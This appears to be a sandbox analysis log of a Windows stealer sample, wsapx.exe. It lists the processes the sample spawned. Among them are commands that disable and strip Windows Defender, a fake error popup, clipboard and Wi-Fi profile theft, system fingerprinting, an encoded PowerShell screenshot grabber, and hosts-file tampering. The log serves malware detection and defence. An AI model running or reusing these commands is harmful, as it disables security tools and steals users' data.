              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722Jump to behavior
              Source: wsapx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\wsapx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: wsapx.exeReversingLabs: Detection: 39%
              Source: wsapx.exeString found in binary or memory: id-cmc-addExtensions
              Source: wsapx.exeString found in binary or memory: set-addPolicy
              Source: wsapx.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: wsapx.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: wsapx.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: wsapx.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: wsapx.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: wsapx.exeString found in binary or memory: --help
              Source: wsapx.exeString found in binary or memory: --help
              Source: C:\Users\user\Desktop\wsapx.exeFile read: C:\Users\user\Desktop\wsapx.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
